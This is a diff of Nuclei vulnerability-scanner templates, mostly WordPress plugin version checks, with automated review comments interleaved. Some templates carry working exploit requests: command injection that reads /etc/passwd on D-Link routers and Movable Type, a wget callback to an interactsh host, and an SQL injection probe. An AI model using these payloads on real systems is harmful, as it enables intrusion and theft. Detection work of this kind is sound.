+ The Nova Blocks by Pixelgrade plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' attribute of the 'wp:separator' Gutenberg block in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3011befd-c0c6-4800-a370-e592c3ec483f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8241
+ metadata:
+ fofa-query: "wp-content/plugins/nova-blocks/"
+ google-query: inurl:"/wp-content/plugins/nova-blocks/"
+ shodan-query: 'vuln:CVE-2024-8241'
+ tags: cve,wordpress,wp-plugin,nova-blocks,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/nova-blocks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "nova-blocks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml b/poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml
new file mode 100644
index 0000000000..58174bec12
--- /dev/null
+++ b/poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8253-e2234cc208110923d0c092c69c0a152e
+
+info:
+ name: >
+ Post Grid and Gutenberg Blocks 2.2.87 - 2.2.90 - Authenticated (Subscriber+) Privilege Escalation
+ author: topscoder
+ severity: low
+ description: >
+ The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in all versions 2.2.87 to 2.2.90. This is due to the plugin not properly restricting what user meta values can be updated and ensuring a form is active. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta to become an administrator.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-8253
+ metadata:
+ fofa-query: "wp-content/plugins/post-grid/"
+ google-query: inurl:"/wp-content/plugins/post-grid/"
+ shodan-query: 'vuln:CVE-2024-8253'
+ tags: cve,wordpress,wp-plugin,post-grid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-grid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-grid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '>= 2.2.87', '<= 2.2.90')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8268.yaml b/poc/cve/CVE-2024-8268.yaml
new file mode 100644
index 0000000000..139fb64172
--- /dev/null
+++ b/poc/cve/CVE-2024-8268.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8268
+
+info:
+ name: >
+ Frontend Dashboard <= 2.2.4 - Authenticated (Subscriber+) Arbitrary Function Call
+ author: topscoder
+ severity: low
+ description: >
+ The Frontend Dashboard plugin for WordPress is vulnerable to unauthorized code execution due to insufficient filtering on callable methods/functions via the ajax_request() function in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to call arbitrary functions that can be leverage for privilege escalation by changing user's passwords.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-8268
+ metadata:
+ fofa-query: "wp-content/plugins/frontend-dashboard/"
+ google-query: inurl:"/wp-content/plugins/frontend-dashboard/"
+ shodan-query: 'vuln:CVE-2024-8268'
+ tags: cve,wordpress,wp-plugin,frontend-dashboard,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/frontend-dashboard/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "frontend-dashboard"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml b/poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml
new file mode 100644
index 0000000000..67784e4f0d
--- /dev/null
+++ b/poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19
+
+info:
+ name: >
+ WooCommerce Photo Reviews Premium <= 1.3.13.2 - Authentication Bypass to Account Takeover and Privilege Escalation
+ author: topscoder
+ severity: critical
+ description: >
+ The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-8277
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-photo-reviews/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-photo-reviews/"
+ shodan-query: 'vuln:CVE-2024-8277'
+ tags: cve,wordpress,wp-plugin,woocommerce-photo-reviews,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-photo-reviews/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-photo-reviews"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.13.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8369.yaml b/poc/cve/CVE-2024-8369.yaml
new file mode 100644
index 0000000000..e1b203f1f3
--- /dev/null
+++ b/poc/cve/CVE-2024-8369.yaml
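Review bot: Detection of this critical, unauthenticated authentication bypass rests entirely on fetching `/wp-content/plugins/woocommerce-photo-reviews/readme.txt` and matching a `Stable tag:` line, yet the plugin's own name marks it as a premium (paid) product, and paid builds do not necessarily ship a wordpress.org-style readme.txt; if that is the case here, the template can never fire and a scan's silence will be read as "not vulnerable". Before the `path` entry I would state the limitation, e.g. `# version fingerprint only; premium builds that omit readme.txt are not detected`, so operators know a no-match needs confirmation by another route. The `Stable tag:` regex also fails closed when the tag is non-numeric (e.g. `trunk`), which is fine but worth a word in the same comment.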
@@ -0,0 +1,59 @@
+id: CVE-2024-8369
+
+info:
+ name: >
+ EventPrime <= 4.0.4.3 - Missing Authorization to Unauthenticated Private or Password-Protected Events Disclosure
+ author: topscoder
+ severity: high
+ description: >
+ The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access to Private or Password-protected events due to missing authorization checks in all versions up to, and including, 4.0.4.3. This makes it possible for unauthenticated attackers to view private or password-protected events.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-8369
+ metadata:
+ fofa-query: "wp-content/plugins/eventprime-event-calendar-management/"
+ google-query: inurl:"/wp-content/plugins/eventprime-event-calendar-management/"
+ shodan-query: 'vuln:CVE-2024-8369'
+ tags: cve,wordpress,wp-plugin,eventprime-event-calendar-management,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/eventprime-event-calendar-management/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "eventprime-event-calendar-management"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.0.4.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml b/poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml
new file mode 100644
index 0000000000..e16d01feaf
--- /dev/null
+++ b/poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-8440-a970a1df0c7918e0736009309dc70109
+
+info:
+ name: >
+ Essential Addons for Elementor -- Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Fancy Text Widget
+ author: topscoder
+ severity: low
+ description: >
+ The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text widget in all versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5960396-5320-4978-aa82-2e33700daa43?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8440
+ metadata:
+ fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/"
+ google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/"
+ shodan-query: 'vuln:CVE-2024-8440'
+ tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "essential-addons-for-elementor-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8478.yaml b/poc/cve/CVE-2024-8478.yaml
new file mode 100644
index 0000000000..60791c5157
--- /dev/null
+++ b/poc/cve/CVE-2024-8478.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8478
+
+info:
+ name: >
+ Affiliate Super Assistent <= 1.5.3 - Unauthenticated Arbitrary Shortcode Execution
+ author: topscoder
+ severity: high
+ description: >
+ The The Affiliate Super Assistent plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.5.3. This is due to the software allowing users to supply arbitrary shortcodes in comments when the 'Parse comments' option is enabled. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 7.3
+ cve-id: CVE-2024-8478
+ metadata:
+ fofa-query: "wp-content/plugins/amazonsimpleadmin/"
+ google-query: inurl:"/wp-content/plugins/amazonsimpleadmin/"
+ shodan-query: 'vuln:CVE-2024-8478'
+ tags: cve,wordpress,wp-plugin,amazonsimpleadmin,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amazonsimpleadmin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "amazonsimpleadmin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.3')
\ No newline at end of file
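Review bot: The `description` of the CVE-2024-8478 template opens with `The The Affiliate Super Assistent plugin for WordPress`, a doubled article carried over from the upstream advisory text; suggest `The Affiliate Super Assistent plugin for WordPress is vulnerable to arbitrary shortcode execution ...`. The plugin's display name also differs from the `amazonsimpleadmin` slug used in `path`, `words` and `tags`, which is correct for detection but easy to mistake for a wrong path on review, so a one-line comment above `path` such as `# plugin slug is amazonsimpleadmin (marketed as Affiliate Super Assistent)` would help the next reader. The note on the first hunk of this patch about `severity` not tracking `cvss-score` does not apply here: 7.3 and `high` agree.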
diff --git a/poc/cve/CVE-2024-8543.yaml b/poc/cve/CVE-2024-8543.yaml new file mode 100644 index 0000000000..e80141baab --- /dev/null +++ b/poc/cve/CVE-2024-8543.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-8543
+
+info:
+ name: >
+ Slider comparison image before and after <= 0.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Slider comparison image before and after plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [sciba] shortcode in all versions up to, and including, 0.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8543
+ metadata:
+ fofa-query: "wp-content/plugins/slider-comparison-image-before-and-after/"
+ google-query: inurl:"/wp-content/plugins/slider-comparison-image-before-and-after/"
+ shodan-query: 'vuln:CVE-2024-8543'
+ tags: cve,wordpress,wp-plugin,slider-comparison-image-before-and-after,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/slider-comparison-image-before-and-after/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "slider-comparison-image-before-and-after"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.8.3')
\ No newline at end of file
diff --git a/poc/cve/cve-2020-16920.yaml b/poc/cve/cve-2020-16920.yaml
index d15e9704d0..c45dc73829 100644
--- a/poc/cve/cve-2020-16920.yaml
+++ b/poc/cve/cve-2020-16920.yaml
@@ -1,59 +1,53 @@ -id: CVE-2019-16920 - -info: - name: Unauthenticated Multiple D-Link Routers RCE - author: dwisiswant0 - severity: critical - description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. - - # References: - # - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r - -requests: - - raw: - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - - | - POST /apply_sec.cgi HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 - Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp - Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 - html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - type: status - status: +id: CVE-2019-16920 + +info: + name: Unauthenticated Multiple D-Link Routers RCE + author: dwisiswant0 + severity: critical + description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. 
+ reference: https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r + tags: cve,cve2019,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16920 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/login_pic.asp + Cookie: uid=1234123 + + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + part: body + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/cve/cve-2020-36112.yaml b/poc/cve/cve-2020-36112.yaml new file mode 100644 index 0000000000..474b9b212a --- /dev/null +++ b/poc/cve/cve-2020-36112.yaml 
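Review bot: The rewritten header keeps `id: CVE-2019-16920` and `cve-id: CVE-2019-16920` in a file named `poc/cve/cve-2020-16920.yaml`; the reference URL on the new side (`CVE-2019-16920-MassPwn3r`) and the `cve2019` tag agree with the id, so the file name is the outlier and should be renamed, otherwise `-id`/`-tags` filtering and the file layout of this repository disagree. The new `reference:` is a single scalar where the rest of this patch uses a list under the same key; both parse, but a list keeps the format uniform.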
@@ -0,0 +1,30 @@
+id: CVE-2020-36112
+
+info:
+ name: CSE Bookstore 1.0 SQL Injection
+ author: geeknik
+ description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
+ reference:
+ - https://www.exploit-db.com/exploits/49314
+ - https://www.tenable.com/cve/CVE-2020-36112
+ severity: critical
+ tags: cve,cve2020,sqli,cse
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-36112
+ cwe-id: CWE-89
+
+requests:
+ - raw:
+ - |
+ GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "get book price failed! You have an error in your SQL syntax"
+ - "Can't retrieve data You have an error in your SQL syntax"
+ condition: or
diff --git a/poc/cve/cve-2021-20837.yaml b/poc/cve/cve-2021-20837.yaml
index 8433e63c9d..ab208a01bc 100644
--- a/poc/cve/cve-2021-20837.yaml
+++ b/poc/cve/cve-2021-20837.yaml
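Review bot: The only matcher is a word match on two MySQL error strings echoed into the body, so the template detects the error-based variant only; a target with error display turned off returns a clean-looking page and nothing fires, even though the description claims time-based and boolean-based blind injection too. Add that caveat to the description, e.g. `Detection relies on the SQL error text being echoed in the response; the blind variants are not tested.` There is also no status matcher or `matchers-condition`, unlike the cve-2020-16920 hunk earlier in this patch that pairs its body check with `- type: status`; if that is the repository's convention this template should follow it.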
@@ -1,56 +1,42 @@ id: CVE-2021-20837 info: - name: MovableType - Remote Command Injection - author: dhiyaneshDK,hackergautam - severity: critical - description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. - reference: - - https://nemesis.sh/posts/movable-type-0day/ - - https://github.com/ghost-nemesis/cve-2021-20837-poc - - https://twitter.com/cyber_advising/status/1454051725904580608 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-20837 - cwe-id: CWE-78 - tags: cve,cve2021,rce,movable + name: Movable Type XMLRPC API vulnerable to OS command injection + author: Min Won + description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Crd --> Orginal Researcher.. 
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + severity: high + tags: cve,cve2021,rce requests: - raw: - | POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} + User-Agent: POC + Accept: */* + Content-Length: 198 + Connection: close Content-Type: text/xml - + - mt.handler_to_coderef - - - - - {{base64("`wget http://{{interactsh-url}}`")}} - - - - + mt.handler_to_coderef + + + + + YGNhdCAvZXRjL3Bhc3N3ZGA= + + + + matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - words: - - "failed loading package" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/05 + - type: regex + regex: + - "root:.*:0:0:" + part: body + diff --git a/poc/cve/cve-2022-0921.yaml b/poc/cve/cve-2022-0921.yaml index 09542ab5a1..5eeef53133 100644 --- a/poc/cve/cve-2022-0921.yaml +++ b/poc/cve/cve-2022-0921.yaml 
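Review bot: The rewritten raw request hard-codes `Content-Length: 198`, which pins the header to one exact body; the client normally derives the length from the body it sends, and a value that does not match the XML-RPC document actually emitted yields a truncated or hanging request, so the header line should be removed (the body as printed here has lost its XML element tags, so it cannot be checked against 198). The new `description` ends in stray text, `Crd --> Orginal Researcher..`, which should be deleted, and the `classification` block (CVSS 9.8, CWE-78) plus three of the four references were dropped while `severity` was lowered to `high` with no reason given in the commit. Replacing the interactsh matcher with an in-band `root:.*:0:0:` match makes the check depend on command output being reflected in the XML response; if that is intended, the description should say so.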
@@ -1,26 +1,37 @@ id: CVE-2022-0954 info: - name: Microweber - Cross-site Scripting + name: Microweber <1.2.11 - Stored Cross-Site Scripting author: amit-jd severity: medium description: | - Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. + Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability. reference: - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0954 cwe-id: CWE-79 + epss-score: 0.00144 + epss-percentile: 0.50222 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2022,xss,microweber,huntr + verified: true + max-request: 3 + vendor: microweber + product: microweber + tags: cve2022,cve,xss,microweber,huntr -requests: +http: - raw: - | POST /api/user_login HTTP/1.1 @@ -28,7 +39,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | POST /api/save_option HTTP/2 Host: {{Hostname}} 
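Review bot: The new description says `Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities`, but the `name` on the line above says `<1.2.11` and the added `remediation` says 1.2.11, so the description's version is a typo; change it to `Microweber before 1.2.11 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods.` The header also keeps `id: CVE-2022-0954` in a file named `cve-2022-0921.yaml`, the same file/id mismatch as the cve-2020-16920 hunk earlier in this patch. This hunk ends inside the first raw request; the rest of that request is outside it.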
